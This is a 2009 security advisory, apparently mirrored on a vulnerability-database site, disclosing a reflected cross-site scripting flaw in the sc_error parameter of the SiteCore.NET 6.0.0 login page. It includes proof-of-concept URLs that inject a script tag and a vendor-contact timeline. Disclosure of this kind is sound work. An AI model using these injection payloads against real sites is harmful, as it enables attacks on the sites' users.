Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21949
HistoryJun 05, 2009 - 12:00 a.m.

[InterN0T] SiteCore.NET 6.0.0 - XSS Vulnerability

2009-06-0500:00:00
vulners.com
10
JSON

SiteCore.NET - Cross Site Scripting Vulnerability

Version Affected: 6.0.0 (rev. 090120) (We were unable to find out if this is the newest version or not).

Info: It's an overpriced CMS for companies running IIS.

Credits: InterN0T

External Links:
http://sitecore.net/

-:: The Advisory ::-

Vulnerable Function / ID Calls: (XSS)
sc_error

Cross Site Scripting:
http://www.website.tld/sitecore/login/default.aspx?sc_error=<script>alert(0)</script>

  • You can input whatever you like in sc_error which will be echoed directly to the end-user as an error message.

2nd Cross Site Scripting: (example)
http://www.website.tld/sitecore/login/default.aspx?sc_error=You do not have any rights to perform that action.
<script>alert(0)</script>

-:: Solution ::-
Weren't able to make one nor did I bother to do so.

Reference:
http://forum.intern0t.net/intern0t-advisories/1082-intern0t-sitecore-net-6-0-0-cross-site-scripting-vulnerability.html

Disclosure Information:

  • Vulnerability found and confirmed between 1st and 3rd June 2009.
  • SiteCore contacted the 3rd June 2009.
  • Published at InterN0T the 3rd June 2009.
  • Bugtraq contacted the 3rd June 2009.

All of the best,
MaXe

JSON